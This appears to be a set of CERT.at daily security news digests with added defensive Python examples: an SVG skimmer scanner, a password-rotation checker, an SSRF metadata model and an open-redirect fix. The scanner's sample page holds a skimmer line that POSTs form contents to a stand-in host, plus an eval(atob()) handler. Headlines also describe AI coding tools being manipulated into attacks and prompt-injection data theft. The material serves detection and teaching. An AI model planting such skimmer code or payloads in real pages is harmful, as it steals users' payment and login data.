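An added example, not code from BleepingComputer or the researchers it cites: a scanner for the pattern the article describes, an inline SVG element sized down to a pixel that carries executable content (a script, an event handler, or a javascript:/data: href). The size threshold, the sample checkout page and the collection URL inside it are constructed for this example.

```python
import re
from html.parser import HTMLParser

TINY_PX = 1.0  # assumption: "pixel-sized" means width and height of at most 1px
SIZE_RE = re.compile(r"^\s*([0-9.]+)\s*(?:px)?\s*$")


def _px(value):
    """Parses a width/height attribute such as "1" or "1px"; None if not a plain length."""
    m = SIZE_RE.match(value or "")
    return float(m.group(1)) if m else None


def _is_tiny(attrs):
    """True when the element's width and height (attributes or inline style) are <= TINY_PX."""
    a = dict(attrs)
    w, h = _px(a.get("width")), _px(a.get("height"))
    style = a.get("style") or ""
    sw = re.search(r"(?<![-\w])width\s*:\s*([0-9.]+)px", style)
    sh = re.search(r"(?<![-\w])height\s*:\s*([0-9.]+)px", style)
    if sw:
        w = float(sw.group(1))
    if sh:
        h = float(sh.group(1))
    return w is not None and h is not None and w <= TINY_PX and h <= TINY_PX


class TinySvgScanner(HTMLParser):
    """Reports executable content found inside pixel-sized inline <svg> elements."""

    def __init__(self):
        super().__init__()
        self.svg_stack = []    # one bool per open <svg>: is it tiny?
        self.in_script = False
        self.findings = []     # (kind, detail) tuples

    def _inside_tiny(self):
        return any(self.svg_stack)

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_stack.append(_is_tiny(attrs))
        if not self._inside_tiny():
            return
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
            self.findings.append(("script", a.get("src") or "inline"))
        for name, value in a.items():
            if name.startswith("on"):
                self.findings.append(("handler", f"{name}={value!r}"))
            elif name in ("href", "xlink:href") and re.match(r"\s*(javascript|data):", value or "", re.I):
                self.findings.append(("href", value))

    def handle_data(self, data):
        # HTMLParser hands the body of a <script> element to handle_data in one piece.
        if self.in_script and self._inside_tiny():
            self.findings.append(("script-body", data.strip()[:60]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        elif tag == "svg" and self.svg_stack:
            self.svg_stack.pop()


def scan_html(html):
    """Returns the (kind, detail) findings for one HTML document."""
    scanner = TinySvgScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal logo SVG plus a 1x1 SVG hiding a skimmer next to the checkout.
SAMPLE_PAGE = """<html><body>
<svg width="200" height="50"><circle r="20"/></svg>
<div id="checkout">
<svg width="1" height="1" style="position:absolute">
  <script>fetch('https://collect.example/c', {method:'POST', body: document.forms[0].innerText});</script>
  <image href="data:image/svg+xml;base64,PHN2Zz4=" onload="eval(atob(this.dataset.p))"/>
</svg>
</div></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(kind, detail)
```

Run it against a saved checkout page; a normal-sized SVG with a script is ignored on purpose, since legitimate interactive graphics exist, while anything executable inside a 1x1 element is worth a look.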
∗∗∗ Not just Veracrypt: VPN developers also locked out by Microsoft ∗∗∗
---------------------------------------------
Evidently the Veracrypt developer is not the only one having problems accessing his Microsoft account. The developers of the VPN software Wireguard and of the VPN service Windscribe also confirm on X that they have been locked out of their accounts. [..] Microsoft is responding.
---------------------------------------------
https://www.golem.de/news/nicht-nur-veracrypt-auch-vpn-entwickler-von-micro…
∗∗∗ Fileless In-Memory Loader Drops ScreenConnect ∗∗∗
---------------------------------------------
In February 2026, Zscaler ThreatLabz discovered an attack chain where attackers used a fake Adobe Acrobat Reader download to lure victims into installing ConnectWise’s ScreenConnect. While ScreenConnect is a legitimate remote access tool, it can be leveraged for malicious purposes. In this blog post, ThreatLabz examines the various stages of this attack, from the download lure to the in-memory loader used to reduce on-disk artifacts that could be used for detection and analysis.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/fileless-memory-loader-drop…
∗∗∗ Claude Code Can Be Manipulated via CLAUDE.md to Run SQL Injection Attacks ∗∗∗
---------------------------------------------
LayerX researchers have discovered how to bypass Claude Code’s safety rules using the CLAUDE.md file. This exploit allows anyone to automate SQL injection attacks and steal user credentials without writing any code.
---------------------------------------------
https://hackread.com/claude-code-claude-md-sql-injection-attacks/
∗∗∗ Commentary: AI FOMO is eating security ∗∗∗
---------------------------------------------
AI systems based on large language models bring new kinds of security vulnerabilities and risks with them. [..] But as important as the discussion of new, comparatively little-researched security problems is, it easily obscures the fact that AI systems always also contain classic software, which naturally contains classic security vulnerabilities.
---------------------------------------------
https://heise.de/-11218162
∗∗∗ CISA in emergency mode: Salary payments for the past six weeks promised ∗∗∗
---------------------------------------------
The US Department of Homeland Security is still in shutdown mode. Now employees are nevertheless to receive pay for six weeks.
---------------------------------------------
https://heise.de/-11250415
∗∗∗ Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8562 ∗∗∗
---------------------------------------------
This is an interesting and somewhat subtle network vulnerability, which again shows how difficult it can be to secure the complex networking services provided by Kubernetes. Like our other unpatchable Kubernetes vulnerabilities, it won't be a significant issue for many Kubernetes clusters, but if you're running a managed Kubernetes service, it's definitely one to consider, as attackers might use it to probe your control plane network. In our next post, we'll be looking at the last of the four unpatchable CVEs in Kubernetes, CVE-2021-25740.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerab…
∗∗∗ TeamPCP Supply Chain Campaign: Update 007 - Cisco Source Code Stolen via Trivy-Linked Breach, Google GTIG Tracks TeamPCP as UNC6780, and CISA KEV Deadline Arrives with No Standalone Advisory, (Wed, Apr 8th) ∗∗∗
---------------------------------------------
This is the seventh update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 006 covered developments through April 3, including the CERT-EU European Commission breach disclosure, ShinyHunters' confirmation of credential sharing, Sportradar breach details, and Mandiant's quantification of 1,000+ compromised SaaS environments. This update consolidates five days of intelligence from April 3 through April 8, 2026.
---------------------------------------------
https://isc.sans.edu/diary/rss/32880
∗∗∗ Number Usage in Passwords: Take Two, (Thu, Apr 9th) ∗∗∗
---------------------------------------------
In a previous diary [1], we looked to see how numbers were used within passwords submitted to honeypots. One of the items of interest was how dates, and more specifically years, were represented within the data and how that changed over time. Years and seasons are often seen in passwords, especially when password policies require frequent password changes.
---------------------------------------------
https://isc.sans.edu/diary/rss/32866
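An added example, not from the ISC diary: a checker for the year and season tokens the diary observes in honeypot passwords, plus a test for the rotation pattern that frequent change requirements encourage (the same password with only its date token swapped). The word lists, the leet substitutions and the accepted year window are assumptions made for this example.

```python
import re
from datetime import date

# Constructed word lists (English plus a few German forms); extend per locale.
SEASONS = ("spring", "summer", "autumn", "winter", "fruehling", "sommer", "herbst")
MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")
# Common leet substitutions folded back to letters before word matching.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})
YEAR4 = re.compile(r"(?<!\d)(19[5-9]\d|20\d\d)(?!\d)")
YEAR2 = re.compile(r"(?<!\d)(\d\d)(?!\d)")


def _plausible(year, today):
    """Assumed window for a two-digit year: the last ten years up to next year."""
    return today.year - 10 <= year <= today.year + 1


def date_tokens(password, today=None):
    """Lists the year/season/month tokens a rotating user is likely to have used."""
    today = today or date.today()
    low = password.lower()
    tokens = []
    for m in YEAR4.finditer(low):                      # four-digit years, 1950..next year
        y = int(m.group(1))
        if 1950 <= y <= today.year + 1:
            tokens.append(f"year:{y}")
    rest = YEAR4.sub("#", low)
    for m in YEAR2.finditer(rest):                     # standalone two-digit years
        if _plausible(2000 + int(m.group(1)), today):
            tokens.append(f"shortyear:{m.group(1)}")
    words = YEAR2.sub("#", rest).translate(LEET)       # leet-fold only after years are taken out
    for w in SEASONS:
        if w in words:
            tokens.append(f"season:{w}")
    for w in MONTHS:
        if w in words:
            tokens.append(f"month:{w}")
    return tokens


def _skeleton(password):
    """The password with every date token replaced by '#', for comparing rotations."""
    s = YEAR2.sub("#", YEAR4.sub("#", password.lower())).translate(LEET)
    for w in SEASONS + MONTHS:
        s = s.replace(w, "#")
    return s


def looks_like_rotation(old, new, today=None):
    """True when the new password is the old one with just its date token swapped,
    e.g. Winter2025! -> Spring2026!, the pattern forced periodic changes produce."""
    return (bool(date_tokens(old, today)) and bool(date_tokens(new, today))
            and _skeleton(old) == _skeleton(new))


if __name__ == "__main__":
    for pw in ("Winter2025!", "Sommer26#", "Fr3d0fromIT"):
        print(pw, date_tokens(pw))
    print(looks_like_rotation("Winter2025!", "Spring2026!"))
```

A password-change endpoint can run looks_like_rotation against the previous hash's plaintext at the moment of change (the only time it is available) and reject the seasonal increment; the token lists are heuristics and will produce the odd false positive on words such as "may".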
∗∗∗ Cracks in the Bedrock: Agent God Mode ∗∗∗
---------------------------------------------
Our first article about the boundaries and resilience of Amazon Bedrock AgentCore focused on the Code Interpreter sandbox, and how it can be bypassed using DNS tunneling. In this second part, we delve into the identity and permissions model of AgentCore and the AgentCore starter toolkit.
---------------------------------------------
https://unit42.paloaltonetworks.com/exploit-of-aws-agentcore-iam-god-mode/
∗∗∗ What we learned about TEE security from auditing WhatsApp's Private Inference ∗∗∗
---------------------------------------------
WhatsApp’s new “Private Inference” feature represents one of the most ambitious attempts to combine end-to-end encryption with AI-powered capabilities, such as message summarization. To make this possible, Meta built a system that processes encrypted user messages inside trusted execution environments (TEEs), secure hardware enclaves designed so that not even Meta can access the plaintext. Our now-public audit, conducted before launch, identified several vulnerabilities that compromised WhatsApp’s privacy model, all of which Meta has patched.
---------------------------------------------
https://blog.trailofbits.com/2026/04/07/what-we-learned-about-tee-security-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Drupal: Orejime - Moderately critical - Cross-site scripting - SA-CONTRIB-2026-032 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-032
∗∗∗ LWN: Security updates for Thursday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1066972/
∗∗∗ Google Chrome 147: Update fixes 60 security vulnerabilities, two of them critical ∗∗∗
---------------------------------------------
https://heise.de/-11249800
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 07-04-2026 18:00 − Wednesday 08-04-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Iran-Linked Hackers Are Sabotaging US Energy and Water Infrastructure ∗∗∗
---------------------------------------------
As Trump threatens Iranian infrastructure, the US government warns that Iran has carried out its own digital attacks against US critical infrastructure.
---------------------------------------------
https://www.wired.com/story/iran-linked-hackers-are-sabotaging-us-energy-an…
∗∗∗ Anthropic Teams Up With Its Rivals to Keep AI From Hacking Everything ∗∗∗
---------------------------------------------
The AI lab's Project Glasswing will bring together Apple, Google, and more than 45 other organizations. They'll use the new Claude Mythos Preview model to test advancing AI cybersecurity capabilities.
---------------------------------------------
https://www.wired.com/story/anthropic-mythos-preview-project-glasswing/
∗∗∗ Important bug bounty program paused: AI reports overwhelm open source projects ∗∗∗
---------------------------------------------
Internet Bug Bounty is paying no more rewards for the time being. This affects Node.js, among others. The reason: with AI, a lot gets reported but little gets fixed.
---------------------------------------------
https://www.golem.de/news/wichtiges-bug-bounty-programm-pausiert-ki-reports…
∗∗∗ Microsoft Releases Open Source Toolkit for AI Agent Runtime Security ∗∗∗
---------------------------------------------
Microsoft has published its Agent Governance Toolkit, an open source project that brings runtime policy enforcement to autonomous AI agents. The release lands as the industry grapples with a widening gap between how fast AI agents are being deployed and how little infrastructure exists to govern what they do once they're running. The toolkit is available under the MIT license at the Microsoft GitHub organization and supports Python, TypeScript, Rust, Go, and .NET.
---------------------------------------------
https://socket.dev/blog/microsoft-open-source-toolkit-for-ai-agent-runtime-…
∗∗∗ Spooler Alert: Remote Unauth'd RCE-to-root Chain in CUPS ∗∗∗
---------------------------------------------
TLDR: my self-orchestrating team of vulnerability hunting agents discovered two issues in CUPS, CVE-2026-34980 and CVE-2026-34990, chainable into unauthenticated remote attacker -> unprivileged RCE -> root file (over)write. See below for the prerequisites, details, and mitigation options.
---------------------------------------------
https://heyitsas.im/posts/cups/
∗∗∗ No new Windows versions: Microsoft locks out Veracrypt developer ∗∗∗
---------------------------------------------
The Veracrypt developer can no longer update the Windows variant of his encryption software. [..] Idrassi says he tried several times to contact Microsoft through various channels, but only reached automated replies and bots.
---------------------------------------------
https://www.golem.de/news/keine-neuen-windows-versionen-microsoft-sperrt-ve…
∗∗∗ A Little Bit Pivoting: What Web Shells are Attackers Looking for?, (Tue, Apr 7th) ∗∗∗
---------------------------------------------
Webshells remain a popular method for attackers to maintain persistence on a compromised web server. Many "arbitrary file write" and "remote code execution" vulnerabilities are used to drop small files on systems for later execution of additional payloads. The names of these files keep changing and are often chosen to "fit in" with other files.
---------------------------------------------
https://isc.sans.edu/diary/rss/32874
∗∗∗ More Honeypot Fingerprinting Scans, (Wed, Apr 8th) ∗∗∗
---------------------------------------------
One question that often comes up when I talk about honeypots: Are attackers able to figure out if they are connected to a honeypot? The answer is pretty simple: Yes!
---------------------------------------------
https://isc.sans.edu/diary/rss/32878
∗∗∗ Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox ∗∗∗
---------------------------------------------
Unit 42 uncovers critical vulnerabilities in Amazon Bedrock AgentCore's sandbox, demonstrating DNS tunneling and credential exposure. [..] We also identified a critical security regression where the AgentCore Runtime utilized a microVM Metadata Service (MMDS) that lacks session token enforcement. Prior to our disclosure and AWS's fixes, this configuration could have allowed an attacker to exploit standard web vulnerabilities, such as server-side request forgery (SSRF), to directly extract sensitive credentials, putting the entire environment at risk.
---------------------------------------------
https://unit42.paloaltonetworks.com/bypass-of-aws-sandbox-network-isolation…
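An added example, not Unit 42's or AWS's code: a minimal in-process model of a metadata endpoint with and without session token enforcement, and an SSRF-style client that can only issue plain GETs with no extra headers, to show what the missing enforcement costs. The paths, header names and the credential string are constructed; the handshake shape (a PUT that returns a short-lived token, then GETs that present it) is modelled on the EC2 IMDSv2 pattern and is an assumption about what "session token enforcement" means for the MMDS in the article.

```python
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

CREDENTIALS_PATH = "/latest/meta-data/iam/security-credentials/role"  # constructed path
TOKEN_PATH = "/latest/api/token"                                      # constructed path
TOKEN_HEADER = "X-metadata-token"                                     # assumed header name
TTL_HEADER = "X-metadata-token-ttl-seconds"                           # assumed header name


@dataclass
class MetadataService:
    """Toy metadata service. require_token=False models the weak configuration."""
    require_token: bool
    secret: str = "constructed-credential-not-real"
    _tokens: Dict[str, float] = field(default_factory=dict)   # token -> expiry (epoch seconds)

    def handle(self, method: str, path: str, headers: Optional[Dict[str, str]] = None,
               now: Optional[float] = None) -> Tuple[int, str]:
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        now = time.time() if now is None else now
        # Token issuance: only via PUT with an explicit TTL, which a GET-only SSRF cannot do.
        if method == "PUT" and path == TOKEN_PATH:
            ttl = int(headers.get(TTL_HEADER.lower(), "0"))
            if not 1 <= ttl <= 21600:
                return 400, "bad ttl"
            token = secrets.token_urlsafe(32)
            self._tokens[token] = now + ttl
            return 200, token
        if method != "GET":
            return 405, "method not allowed"
        if self.require_token:
            token = headers.get(TOKEN_HEADER.lower())
            if token is None or self._tokens.get(token, 0) <= now:
                return 401, "token required"
        if path == CREDENTIALS_PATH:
            return 200, self.secret
        return 404, "not found"


def ssrf_fetch(service: MetadataService, path: str) -> Tuple[int, str]:
    """Models a typical SSRF primitive: the attacker controls the URL, but the
    vulnerable app issues a plain GET and cannot add headers or change the method."""
    return service.handle("GET", path)


def legitimate_fetch(service: MetadataService, path: str) -> Tuple[int, str]:
    """What a real workload does: obtain a session token, then present it."""
    status, token = service.handle("PUT", TOKEN_PATH, {TTL_HEADER: "300"})
    assert status == 200
    return service.handle("GET", path, {TOKEN_HEADER: token})


if __name__ == "__main__":
    weak = MetadataService(require_token=False)
    strict = MetadataService(require_token=True)
    print("weak, via SSRF:      ", ssrf_fetch(weak, CREDENTIALS_PATH))
    print("enforcing, via SSRF: ", ssrf_fetch(strict, CREDENTIALS_PATH))
    print("enforcing, workload: ", legitimate_fetch(strict, CREDENTIALS_PATH))
```

The point of the token is not secrecy but the method and header requirements: an SSRF bug in a web app usually gives the attacker a GET with whatever headers the app already sends, so a PUT-issued token that must be echoed back closes the common path even when the metadata address itself is reachable.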
∗∗∗ New ClickFix Attack Uses Node.js Malware via Tor to Steal Crypto ∗∗∗
---------------------------------------------
Netskope Threat Labs report a new ClickFix attack using fake CAPTCHAs to deploy Tor-backed NodeJS malware and drain crypto wallets on Windows.
---------------------------------------------
https://hackread.com/clickfix-attack-node-js-malware-tor-steal-crypto/
∗∗∗ Patch now! Attacks on low-code tool Flowise observed ∗∗∗
---------------------------------------------
Unknown attackers are currently exploiting a critical security vulnerability with the highest severity rating in Flowise. [..] To protect systems against these attacks, admins must ensure that at least Flowise 3.0.6 is installed. The current release is 3.1.1.
---------------------------------------------
https://heise.de/-11248346
∗∗∗ When the compiler lies: breaking memory safety in safe Go ∗∗∗
---------------------------------------------
Early in March, I reported two compiler bugs affecting Go releases up to 1.26.1 which broke the Go memory safety guarantees using only safe Go code. [..] I’m not including the full end-to-end exploits, to allow the fixed releases to become more widely available. I’ll briefly describe the issues and show the problematic code patterns though.
---------------------------------------------
https://ciolek.dev/posts/when-the-compiler-lies
=====================
= Vulnerabilities =
=====================
∗∗∗ Palo Alto Networks Security Advisories ∗∗∗
---------------------------------------------
Palo Alto has released 6 new security advisories (1x high, 3x medium, 2x informational)
---------------------------------------------
https://security.paloaltonetworks.com/
∗∗∗ Juniper: 2026-04 Security Bulletin: vLWC: Default password is not required to be changed which allows unauthorized high-privileged access (CVE-2026-33784) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-vLWC-…
∗∗∗ Juniper: 2026-04 Security Bulletin: CTP OS: Configuring password requirements does not work which permits the use of weak passwords (CVE-2026-33771) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-CTP-O…
∗∗∗ Juniper: 2026-04 Security Bulletin: Apstra: SSH host key validation vulnerability for managed devices (CVE-2025-13914) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-Apstr…
∗∗∗ LWN: Security updates for Wednesday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1066809/
∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 140.9.1 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-29/
∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 149.0.2 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-28/
∗∗∗ Nix security advisory: Privilege escalation via symlink following during FOD output registration ∗∗∗
---------------------------------------------
https://discourse.nixos.org/t/nix-security-advisory-privilege-escalation-vi…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 03-04-2026 18:00 − Tuesday 07-04-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Hackers exploit React2Shell in automated credential theft campaign ∗∗∗
---------------------------------------------
Hackers are running a large-scale campaign to steal credentials in an automated way after exploiting React2Shell (CVE-2025-55182) in vulnerable Next.js apps.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-react2shell-…
∗∗∗ Drift $280M crypto theft linked to 6-month in-person operation ∗∗∗
---------------------------------------------
The Drift Protocol says that the $280+ million hack it suffered last week was the result of a long-term, carefully planned operation that included building "a functioning operational presence inside the Drift ecosystem."
---------------------------------------------
https://www.bleepingcomputer.com/news/security/drift-280m-crypto-theft-link…
∗∗∗ How often are redirects used in phishing in 2026?, (Mon, Apr 6th) ∗∗∗
---------------------------------------------
In one of his recent diaries, Johannes discussed how open redirects are actively being sought out by threat actors, which made me wonder about how commonly these mechanisms are actually misused. Although open redirect is not generally considered a high-impact vulnerability on its own, it can have multiple negative implications. Johannes already covered one in connection with OAuth flows, but another important (mis)use case for them is phishing.
---------------------------------------------
https://isc.sans.edu/diary/rss/32870
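An added example, not from the ISC diary: the redirect-parameter pattern the diary discusses, with the naive handler beside a hardened one, and a small log-side check that flags redirect parameters pointing off-site (the kind of request an attacker probing for open redirects, or a phishing link abusing one, would produce). The site origin, parameter names and sample URLs are constructed for this example.

```python
from urllib.parse import parse_qsl, urljoin, urlparse

SITE_ORIGIN = "https://app.example.com"  # constructed: the site performing the redirect
# Assumed set of query parameter names commonly used to carry a post-login target.
REDIRECT_PARAM_NAMES = {"next", "url", "redirect", "redirect_uri", "return",
                        "returnurl", "goto", "dest", "continue"}


def naive_redirect_target(next_param: str) -> str:
    """Vulnerable: trusts the parameter wholesale, so ?next=https://evil.example
    sends the victim off-site while the link they clicked showed a trusted domain."""
    return next_param


def _same_origin(target: str) -> bool:
    """True when target resolves (relative to SITE_ORIGIN) to our own scheme and host."""
    if "\\" in target:
        # Browsers treat "/\evil.example" like "//evil.example"; urllib does not.
        return False
    resolved = urlparse(urljoin(SITE_ORIGIN, target))
    ours = urlparse(SITE_ORIGIN)
    # Rejects //evil, https://evil, user@evil, and javascript:/data: (which urljoin leaves as-is).
    return resolved.scheme == ours.scheme and resolved.netloc == ours.netloc


def safe_redirect_target(next_param: str, default: str = "/") -> str:
    """Hardened: only same-site targets are honoured, and only their path and query
    are reissued, so the response never echoes a foreign absolute URL."""
    if not next_param or not _same_origin(next_param):
        return default
    resolved = urlparse(urljoin(SITE_ORIGIN, next_param))
    path = resolved.path or "/"
    query = f"?{resolved.query}" if resolved.query else ""
    return path + query


def external_redirect_params(request_url: str):
    """Flags redirect-style query parameters whose value points outside SITE_ORIGIN;
    run it over access-log request URLs to spot probing or abuse of an open redirect."""
    hits = []
    for name, value in parse_qsl(urlparse(request_url).query, keep_blank_values=True):
        if name.lower() in REDIRECT_PARAM_NAMES and not _same_origin(value):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    for candidate in ("/dashboard?tab=1", "//evil.example/login", "https://evil.example/",
                      "/\\evil.example", "javascript:alert(1)"):
        print(repr(candidate), "->", safe_redirect_target(candidate))
    print(external_redirect_params("https://app.example.com/login?next=https://evil.example/x&lang=en"))
```

If the application genuinely needs to redirect to other hosts (an SSO hub, for instance), replace the same-origin test with an explicit allowlist of hostnames compared exactly, never with a substring or prefix match on the URL.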
∗∗∗ China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware ∗∗∗
---------------------------------------------
A China-based threat actor known for deploying Medusa ransomware has been linked to the weaponization of a combination of zero-day and N-day vulnerabilities to orchestrate "high-velocity" attacks and break into susceptible internet-facing systems.
---------------------------------------------
https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html
∗∗∗ Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign ∗∗∗
---------------------------------------------
An active campaign has been observed targeting internet-exposed instances running ComfyUI, a popular stable diffusion platform, to enlist them into a cryptocurrency mining and proxy botnet.
---------------------------------------------
https://thehackernews.com/2026/04/over-1000-exposed-comfyui-instances.html
∗∗∗ The Hack That Exposed Syria’s Sweeping Security Failures ∗∗∗
---------------------------------------------
When Syrian government accounts were hijacked in March, the breach looked chaotic. But it revealed something more troubling: a state struggling with the most basic layer of cybersecurity.
---------------------------------------------
https://www.wired.com/story/inside-the-hack-that-exposed-syrias-security-fa…
∗∗∗ Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab ∗∗∗
---------------------------------------------
An elusive hacker who went by the handle "UNKN" and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face. Authorities in Germany say 31-year-old Russian Daniil Maksimovich Shchukin headed both cybercrime gangs and helped carry out at least 130 acts of computer sabotage and extortion against victims across the country between 2019 and 2021.
---------------------------------------------
https://krebsonsecurity.com/2026/04/germany-doxes-unkn-head-of-ru-ransomwar…
∗∗∗ The ID Austria certificate is expiring? When fraud and reality blur ∗∗∗
---------------------------------------------
Indeed, around 300,000 ID Austria certificates will lose their validity in the coming months. Anyone who does not renew in time must apply for a new one. SMS messages warning of imminent expiry, however, are and remain what they have always been: fraud attempts! This article explains how to recognise the trap.
---------------------------------------------
https://www.watchlist-internet.at/news/id-austria-laeuft-ab/
∗∗∗ Understanding Current Threats to Kubernetes Environments ∗∗∗
---------------------------------------------
Unit 42 uncovers escalating Kubernetes attacks, detailing how threat actors exploit identities and critical vulnerabilities to compromise cloud environments.
---------------------------------------------
https://unit42.paloaltonetworks.com/modern-kubernetes-threats/
∗∗∗ Hackers threaten to leak data after cyberattack on German party Die Linke ∗∗∗
---------------------------------------------
Die Linke confirmed in late March that its IT infrastructure had been hit by what it described as a “serious cyberattack.”
---------------------------------------------
https://therecord.media/hackers-threaten-to-leak-german-political-party-data
∗∗∗ Cyberattack on telecom giant Rostelecom disrupts internet services across Russia ∗∗∗
---------------------------------------------
A “large-scale” distributed denial-of-service (DDoS) attack targeted the network of Russian state-run telecom giant Rostelecom on Monday evening, temporarily disrupting online banking, government platforms and other digital services across dozens of cities.
---------------------------------------------
https://therecord.media/rostelecom-cyberattack-disrupts-russian-internet-ac…
∗∗∗ UK exposes Russian military intelligence hijacking vulnerable routers for cyber attacks ∗∗∗
---------------------------------------------
New advisory warns cyber threat group APT28 have exploited vulnerable edge devices to support malicious operations.
---------------------------------------------
https://www.ncsc.gov.uk/news/uk-exposes-russian-military-intelligence-hijac…
∗∗∗ GrafanaGhost Vulnerability Allows Silent Data Theft via AI Injection ∗∗∗
---------------------------------------------
GrafanaGhost is a critical vulnerability in Grafana’s AI components that uses indirect prompt injection and protocol-relative URL bypasses to exfiltrate data.
---------------------------------------------
https://hackread.com/grafanaghost-vulnerability-data-theft-via-ai-injection/
∗∗∗ A Cryptography Engineer’s Perspective on Quantum Computing Timelines ∗∗∗
---------------------------------------------
My position on the urgency of rolling out quantum-resistant cryptography has changed compared to just a few months ago. You might have heard this privately from me in the past weeks, but it’s time to signal and justify this change of mind publicly.
---------------------------------------------
https://words.filippo.io/crqc-timeline/
∗∗∗ Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign ∗∗∗
---------------------------------------------
Since we published our initial analysis of the axios compromise, a deep dive into its hidden blast radius, and a report on the maintainer confirming it was social engineering, maintainers across the Node.js ecosystem have come out of the woodwork to report that they were targeted by the same social engineering campaign. The accounts now span some of the most widely depended-upon packages in the npm registry and Node.js core itself, and together they confirm that axios was not a one-off target.
---------------------------------------------
https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers
∗∗∗ Getting root on TP-Link Smart Switches using CVE-2026-1668 ∗∗∗
---------------------------------------------
In the previous post, I described how we can exploit CVE-2026-1668 to gain arbitrary code execution. In this post, I go into the details of building a useful exploit payload.
---------------------------------------------
https://blog.tangrs.id.au/2026/04/06/exploiting-cve-2026-1668-part-3/
=====================
= Vulnerabilities =
=====================
∗∗∗ Disgruntled researcher leaks “BlueHammer” Windows zero-day exploit ∗∗∗
---------------------------------------------
Exploit code has been released for an unpatched Windows privilege escalation flaw reported privately to Microsoft, allowing attackers to gain SYSTEM or elevated administrator permissions.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks…
∗∗∗ Printing system: Cups vulnerabilities endanger numerous Linux systems ∗∗∗
---------------------------------------------
A researcher set AI agents loose on the Cups printing system. Two vulnerabilities they discovered give attackers remote root access.
---------------------------------------------
https://www.golem.de/news/von-ki-agenten-entdeckt-print-server-luecken-gefa…
∗∗∗ Update now! Critical FortiClient EMS vulnerability is under attack ∗∗∗
---------------------------------------------
Fortinet has released hotfixes and urgently advises admins to apply them promptly. They close a code injection vulnerability that is being actively attacked.
---------------------------------------------
https://www.heise.de/news/FortiClient-EMS-Kritische-Codeschmuggel-Luecke-wi…
∗∗∗ 50,000 WordPress Sites affected by Arbitrary File Upload Vulnerability in Ninja Forms – File Upload WordPress Plugin ∗∗∗
---------------------------------------------
On January 8th, 2026, we received a submission for an Arbitrary File Upload vulnerability in Ninja Forms - File Upload, a WordPress plugin with an estimated 50,000 active installations. This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution.
---------------------------------------------
https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-ar…
∗∗∗ Attackers can attack the web interface of WatchGuard Firebox ∗∗∗
---------------------------------------------
WatchGuard firewalls of the Firebox series and the products Dimension and WebBlockerServer are vulnerable. Security patches are available.
---------------------------------------------
https://heise.de/-11246291
∗∗∗ LWN Security updates for Tuesday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1066665/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 02-04-2026 18:00 − Friday 03-04-2026 18:00
Handler: Guenes Holler
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ New Rowhammer attacks give complete control of machines running Nvidia GPUs ∗∗∗
---------------------------------------------
Over the past decade, dozens of newer Rowhammer attacks have evolved to, among other things [..] On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—and potentially much more consequential—territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine. For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings.
---------------------------------------------
https://arstechnica.com/security/2026/04/new-rowhammer-attacks-give-complet…
∗∗∗ Picking Up Skull Vibrations? Could Be XR Headset Authentication ∗∗∗
---------------------------------------------
The next frontier for biometric authentication may be upon us, and it involves the vibrations of one's skull. Last week, a research team led by Rutgers University introduced a new biometric authentication software compatible with extended reality (XR) headsets — the umbrella term for virtual reality, augmented reality, and mixed reality hardware.
